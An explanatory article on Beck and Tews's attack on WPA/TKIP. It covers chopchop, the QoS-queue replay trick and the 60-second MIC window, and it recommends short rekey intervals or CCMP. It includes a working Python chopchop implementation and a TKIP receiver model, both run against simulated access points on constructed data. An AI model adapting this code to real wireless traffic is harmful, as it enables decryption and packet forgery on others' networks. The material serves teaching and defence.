Security experts reveal details of WPA hack
In their paper, Practical attacks against WEP and WPA, Martin Beck and Erik Tews have published details of their attack on WPA-secured networks. The attack is essentially a variant of the chopchop attack on WEP-secured networks, which surfaced in early 2005. The name is a nod to the chopchop tool written by KoreK, which lets an attacker decrypt an arbitrary encrypted packet without knowing the WEP key.
The program slices the last byte off a WEP packet. Assuming the plaintext of the removed byte was zero, it XORs the last four remaining bytes with a correction value chosen so that the checksum (the CRC-32 integrity check value, ICV) is valid again; because CRC-32 is linear, that correction depends only on the guessed byte, not on the rest of the unknown packet. It then sends the shortened packet to the access point and observes whether it is accepted. If not, it assumes the removed byte was a 1, and so on, in the worst case all the way up to 255. The process is then repeated for every further byte of the packet. Once finished, the attacker has the packet in plain text.
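The chopchop round described above, as an added example (not code from the paper or from the KoreK tool): a simulated WEP access point acts as the yes/no oracle, and the attacker recovers the keystream one byte per round. The key, IV and payload are constructed for this page; the four-byte correction is derived from the linearity of CRC-32 and depends only on the guessed byte, which is what lets the attack proceed without knowing the rest of the packet.

```python
import struct
import zlib

# CRC-32 table for the polynomial WEP uses for its ICV (the same one zlib uses).
CRC_POLY = 0xEDB88320
CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ CRC_POLY if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)
# The top byte of every table entry is distinct, so one CRC step can be undone.
TOP_BYTE_INV = {entry >> 24: idx for idx, entry in enumerate(CRC_TABLE)}

def chop_delta(guess):
    """XOR mask for the last four bytes of a frame whose final byte was just
    removed, assuming that byte's plaintext was `guess`. CRC-32 is linear, so
    the mask depends only on the guess, not on the rest of the unknown frame."""
    g = TOP_BYTE_INV[guess ^ 0xFF]
    return ((CRC_TABLE[g] & 0xFFFFFF) << 8) | ((~g) & 0xFF)

def rc4_keystream(key, n):
    """Plain RC4; WEP seeds it with IV || key and XORs the output over the frame."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_frame(data):
    """Plaintext frame body: data followed by its little-endian CRC-32 ICV."""
    return data + struct.pack("<I", zlib.crc32(data))

def wep_encrypt(key, iv, data):
    frame = wep_frame(data)
    return bytes(a ^ b for a, b in zip(frame, rc4_keystream(iv + key, len(frame))))

class AccessPoint:
    """Simulated AP: the only thing it leaks is whether the ICV checks out."""

    def __init__(self, key):
        self.key = key

    def accepts(self, iv, cipher):
        ks = rc4_keystream(iv + self.key, len(cipher))
        frame = bytes(a ^ b for a, b in zip(cipher, ks))
        return zlib.crc32(frame[:-4]) == struct.unpack("<I", frame[-4:])[0]

def chopchop(ap, iv, cipher):
    """Recover the keystream byte at every position from 4 upwards, one byte per
    round and at most 256 oracle queries per byte. Returns (keystream, queries)."""
    work = bytearray(cipher)
    keystream = {}
    queries = 0
    while len(work) > 4:
        pos = len(work) - 1
        for guess in range(256):
            queries += 1
            candidate = bytearray(work[:-1])
            tail = struct.unpack("<I", bytes(candidate[-4:]))[0] ^ chop_delta(guess)
            candidate[-4:] = struct.pack("<I", tail)
            if ap.accepts(iv, bytes(candidate)):
                keystream[pos] = work[pos] ^ guess   # plaintext at pos was `guess`
                work = candidate                    # the shortened frame is valid again
                break
        else:
            raise RuntimeError("no guess accepted; the AP is not a usable oracle")
    return keystream, queries

def recover_plaintext(cipher, keystream):
    """Plaintext from position 4 onwards; in real WEP traffic the first four bytes
    are the fixed LLC/SNAP header (AA AA 03 00) and are known anyway."""
    return bytes(cipher[p] ^ keystream[p] for p in range(4, len(cipher)))

# Constructed sample traffic: a 104-bit WEP key, an IV and a short frame.
KEY = bytes.fromhex("0123456789abcdef0123456789")
IV = b"\x01\x02\x03"
DATA = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"chopchop demo!"

def demo():
    ap = AccessPoint(KEY)
    cipher = wep_encrypt(KEY, IV, DATA)
    keystream, queries = chopchop(ap, IV, cipher)
    return recover_plaintext(cipher, keystream), queries, len(cipher)

if __name__ == "__main__":
    plain, queries, n = demo()
    print(f"recovered {n - 4} of {n} bytes with {queries} oracle queries: {plain!r}")
```

On average each byte costs 128 queries, so a frame of n bytes needs roughly 128 × (n − 4) packets sent to the access point; this is the per-byte cost that the TKIP countermeasures discussed next try to make unaffordable.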
While the Temporal Key Integrity Protocol (TKIP) usually used with WPA also relies on the RC4 algorithm, it adds a number of security measures, including countermeasures against chopchop. A packet whose WEP-era checksum (ICV) is wrong is discarded silently, but a packet with a valid ICV and an invalid message integrity check (MIC) causes the client to send a MIC failure report, and if a second MIC failure occurs within 60 seconds the client shuts the connection down and forces a rekey. Furthermore, the TKIP Sequence Counter (TSC) makes it difficult to replay captured packets, which hampers chopchop and other replay attacks: a received packet whose TSC is not higher than the current counter is simply thrown out.
According to Beck and Tews, these limitations are relatively easy to get around: the attacker keeps to the 60-second window, so that no two MIC failures fall into it, and makes use of the quality of service (QoS) functions of the access point. QoS supports 8 queues (the paper's "channels"), each with its own TSC, so the attacker simply replays the chopped packets on a different queue than the one on which they were captured in order to sidestep the replay check. Normally all traffic runs over queue 0, while the TSCs of the other queues are rarely incremented, so the TSC of the replayed packet is practically always higher than the counter of the queue it is injected into.
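How the per-queue replay counter and the MIC countermeasure interact in this attack, as an added example (a model written for this page, not the paper's code): the timings, queue numbers, TSC values and verdict strings are constructed. It shows the oracle the attacker relies on (a bad ICV is dropped silently, a bad MIC is reported), why spacing correct guesses 60 seconds apart avoids the countermeasure, and why each idle queue accepts the replayed TSC only once, which is the limit on injected packets discussed further down.

```python
class TkipReceiver:
    """Model of the TKIP receive-side checks: one replay counter per QoS queue,
    a silent drop on ICV failure, and countermeasures after two MIC failures
    within 60 seconds. Added example, not code from the paper."""

    COUNTERMEASURE_WINDOW = 60.0  # seconds

    def __init__(self, queues=8):
        self.tsc = [-1] * queues   # highest TSC accepted on each QoS queue
        self.mic_failures = []     # times of recent MIC failures
        self.rekeys = 0            # how often countermeasures forced a rekey

    def receive(self, tid, tsc, icv_ok, mic_ok, now):
        # Replay check first: the TSC must exceed the counter of *this* queue.
        if tsc <= self.tsc[tid]:
            return "dropped: replay"
        # A bad ICV is discarded silently; the sender learns nothing.
        if not icv_ok:
            return "dropped: icv"
        # A good ICV with a bad MIC is reported, and two in the window trigger
        # countermeasures (connection shutdown plus rekey).
        if not mic_ok:
            self.mic_failures = [t for t in self.mic_failures
                                 if now - t < self.COUNTERMEASURE_WINDOW]
            self.mic_failures.append(now)
            if len(self.mic_failures) >= 2:
                self.rekeys += 1
                self.mic_failures.clear()
                return "mic failure: countermeasures, rekey"
            return "mic failure: report sent"
        # Only a fully valid frame advances the queue's counter.
        self.tsc[tid] = tsc
        return "accepted"


def attack_trace():
    """Constructed exchange: the AP's legitimate traffic uses queue 0; the
    attacker replays a captured frame (TSC 1000) on the idle queues.
    Returns the receiver's verdicts in order and the number of rekeys."""
    rx = TkipReceiver()
    log = []
    # Legitimate frame on queue 0, then a straight replay on the same queue.
    log.append(rx.receive(tid=0, tsc=1000, icv_ok=True, mic_ok=True, now=0.0))
    log.append(rx.receive(tid=0, tsc=1000, icv_ok=True, mic_ok=True, now=1.0))
    # Chopchop on queue 1: wrong guess (bad ICV) versus right guess (bad MIC).
    log.append(rx.receive(tid=1, tsc=1000, icv_ok=False, mic_ok=False, now=2.0))
    log.append(rx.receive(tid=1, tsc=1000, icv_ok=True, mic_ok=False, now=3.0))
    # Next correct guess a full 60 s later: still only a report, no rekey.
    log.append(rx.receive(tid=1, tsc=1000, icv_ok=True, mic_ok=False, now=63.0))
    # With keystream and MIC key in hand: one forged frame per idle queue ...
    for tid in range(1, 8):
        log.append(rx.receive(tid=tid, tsc=1000, icv_ok=True, mic_ok=True, now=200.0 + tid))
    # ... and the same TSC is now exhausted on every queue.
    log.append(rx.receive(tid=1, tsc=1000, icv_ok=True, mic_ok=True, now=210.0))
    return log, rx.rekeys


def impatient_attacker():
    """Two correct guesses 5 s apart: the second one triggers the countermeasures."""
    rx = TkipReceiver()
    rx.receive(tid=1, tsc=1000, icv_ok=True, mic_ok=False, now=0.0)
    verdict = rx.receive(tid=1, tsc=1000, icv_ok=True, mic_ok=False, now=5.0)
    return verdict, rx.rekeys


if __name__ == "__main__":
    for line in attack_trace()[0]:
        print(line)
    print(impatient_attacker())
```

The model follows the rule that the replay counter only advances on a frame that passes both checks; a receiver that bumped the counter on a MIC failure would cut the attack short after the first correct guess on each queue.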
If this type of WPA attack is used against an encrypted ARP packet, whose plain text structure is largely fixed, the attacker only has to figure out the IP addresses, the MIC, and the WEP-era integrity check value (ICV). Chopchop recovers the MIC (8 bytes) and the ICV (4 bytes), 12 bytes in total; the IP addresses the attacker has to come up with on his own. According to Beck and Tews, once the whole packet is known in plain text, the attacker has the keystream for this packet (ciphertext XOR plain text), and because the Michael MIC function can be run backwards from a known plain text and its MIC, the MIC key for the direction from access point to client as well, all without knowledge of the original key. Further packets from the AP to the client can then be decrypted with relatively little effort. With the keystream and the MIC key the attacker can encrypt his own packets and send them to a client, for instance falsified ARP or ICMP packets that divert additional traffic.
This type of WPA attack is significantly limited. A successful attack requires a relatively long TKIP rekeying interval; Beck and Tews assume 3600 seconds. The wireless multimedia extensions (WMM) also have to be enabled so that several QoS queues are available. And once a packet has been decrypted (assuming that legitimate traffic only uses queue 0), the attacker can send just one packet apiece over queues 1 to 7: each accepted packet raises that queue's counter to the replayed TSC, after which the attacker's packets, which reuse that TSC, are no longer higher than the counters.
Furthermore, the attack only works in one direction, from the access point to the client; the AP itself cannot be attacked with this method. It also currently works only with ARP packets, which yields the keystream within 12 to 15 minutes. These limitations make the WPA attack appear far less spectacular than the WEP attacks of their time. Still, it is a beginning, and the approach shows that WPA can be cracked in ways other than brute force. The threat to WPA-secured networks depends on the application; it is possible that the method can already be used to attack corporate networks. Home users' wireless networks are probably not threatened yet, since this type of attack hardly allows covert surfing.
In their paper, Tews and Beck suggest reducing the TKIP rekeying interval to 120 seconds or less to defend against this type of attack; within that time only part of a packet can be recovered. Better still, the authors say, is to switch to the CCMP (AES) encryption method if the access point supports it. CCMP is currently considered secure.
- Practical attacks against WEP and WPA, Report by Martin Beck and Erik Tews